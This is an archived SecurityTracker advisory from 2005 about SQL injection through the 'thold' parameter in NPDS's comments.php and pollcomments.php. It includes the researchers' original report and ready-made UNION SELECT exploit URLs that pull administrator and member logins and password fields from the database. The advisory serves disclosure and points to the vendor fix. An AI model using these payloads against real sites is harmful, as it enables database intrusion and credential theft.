SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Net Portal Dynamic System (NPDS) Vendors:   npds.org
NPDS Input Validation Holes in 'comments.php' and 'pollcomments.php' Permit SQL Injection
SecurityTracker Alert ID:  1013973
SecurityTracker URL:  http://securitytracker.com/id/1013973
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 16 2005
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   Romano, Benjilenoob, and NoSP reported several input validation vulnerabilities in NPDS. A remote user can inject SQL commands.

The 'comments.php' and 'pollcomments.php' scripts do not properly validate user-supplied input in the 'thold' parameter. A remote user can supply specially crafted parameter values to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors

http://[target]/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users

http://[target]/npds/pollcomments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors

http://[target]/npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20u

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   The vendor has issued a fix (using the new 'protect_url.php' file), described at:

http://www.npds.org/article.php?sid=1254&thold=0

Vendor URL:  www.npds.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  SQL injection in NPDS


Category:  Application (Multimedia)  >  CMS-NPDS  	

Vendors:  www.npds.org

Title : Inject SQL command in pollcomments.php & comments.php

Date:  May 15 2005

Impact:  Disclosure of authentication information, Disclosure of user 
information, ...

Fix Available:  Yes    

Solution : use protect_url.php (see www.npds.org for more details)

Description : Romano, Benjilenoob and NoSP reported several vulnerabilities in 
NPDS. A remote user can inject SQL commands in $thold variable from 
comments.php or pollcomments.php.     
The scripts does not properly filter user-supplied $thold variable.
      
Some demonstration exploit URLs are provided:

Disclosure login/pass admin
http://localhost/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors

Diclosure login/pass members
http://localhost/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users

Disclosure login/pass admin
http://localhost/npds/pollcomments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors

Diclosure login/pass members
http://localhost/npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users

Reported By:  "Romano" <romano_45 AT hotmail_DOT_com, "NoSP" <NoSP AT 
thehackademy DOT net> "Benjilenoob" <benjilenoob AT hotmail DOT com>
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC